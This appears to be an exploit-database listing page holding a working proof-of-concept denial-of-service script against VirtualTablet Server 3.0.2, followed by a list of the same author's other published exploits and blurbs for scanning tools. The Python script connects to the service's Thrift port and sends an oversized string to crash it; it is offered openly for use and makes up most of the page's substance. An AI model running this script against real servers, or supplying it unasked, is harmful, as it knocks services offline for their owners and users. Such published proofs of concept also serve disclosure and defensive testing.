Search for hundreds of thousands of exploits

"VirtualTablet Server 3.0.2 - Denial of Service (PoC)"

Author

Exploit author

"Dolev Farhi"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-05-01

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC)
# Author: Dolev Farhi
# Date: 2020-04-29
# Vulnerable version: 3.0.2 (14)
# Link: http://www.sunnysidesoft.com/
# CVE: N/A


from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from pygen.example import Example

host = '192.168.1.1'
port = 57110

try:
    transport = TSocket.TSocket(host, port)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = Example.Client(protocol)
    transport.open()
    client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
    transport.close()

except Thrift.TException as tx:
    print(tx.message)
Release DateTitleTypePlatformAuthor
2020-05-01"VirtualTablet Server 3.0.2 - Denial of Service (PoC)"doswindows"Dolev Farhi"
2019-02-18"M/Monit 3.7.2 - Privilege Escalation"webappsmultiple"Dolev Farhi"
2018-06-18"RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery (Add Admin)"webappslinux"Dolev Farhi"
2018-06-11"userSpice 4.3.24 - Username Enumeration"webappsphp"Dolev Farhi"
2018-06-11"userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting"webappsphp"Dolev Farhi"
2018-02-16"UserSpice 4.3 - Blind SQL Injection"webappsphp"Dolev Farhi"
2018-02-14"userSpice 4.3 - Cross-Site Scripting"webappsphp"Dolev Farhi"
2017-03-16"Cobbler 2.8.0 - (Authenticated) Remote Code Execution"webappslinux"Dolev Farhi"
2016-08-04"ntop-ng 2.5.160805 - Username Enumeration"webappsmultiple"Dolev Farhi"
2016-04-29"Observium 0.16.7533 - Cross-Site Request Forgery"webappsphp"Dolev Farhi"
2016-04-29"Observium 0.16.7533 - (Authenticated) Arbitrary Command Execution"webappsphp"Dolev Farhi"
2015-12-01"ntop-ng 2.0.151021 - Privilege Escalation"webappsmultiple"Dolev Farhi"
2015-10-30"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution"webappshardware"Dolev Farhi"
2015-06-12"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities"webappsmultiple"Dolev Farhi"
2015-05-20"ZOC SSH Client - Buffer Overflow (SEH) (PoC)"doswindows"Dolev Farhi"
2014-09-29"OpenFiler 2.99.1 - Cross-Site Request Forgery"webappsphp"Dolev Farhi"
2014-09-20"M/Monit 3.3.2 - Cross-Site Request Forgery"webappsphp"Dolev Farhi"
2014-09-02"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)"webappsmultiple"Dolev Farhi"
2014-07-25"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting"webappsmultiple"Dolev Farhi"
2014-07-23"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure"webappshardware"Dolev Farhi"
2014-05-25"User Cake - Cross-Site Request Forgery"webappsphp"Dolev Farhi"
2014-05-24"Mayan-EDms Web-Based Document Management OS System - Multiple Persistent Cross-Site Scripting Vulnerabilities"webappsmultiple"Dolev Farhi"
2014-05-12"SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting"webappswindows"Dolev Farhi"
2014-05-08"OpenFiler 2.99.1 - Arbitrary Code Execution"webappshardware"Dolev Farhi"
2014-05-08"Cobbler 2.4.x < 2.6.x - Local File Inclusion"webappsphp"Dolev Farhi"
2014-05-08"OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities"webappshardware"Dolev Farhi"
2014-05-01"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting"webappshardware"Dolev Farhi"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48402/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.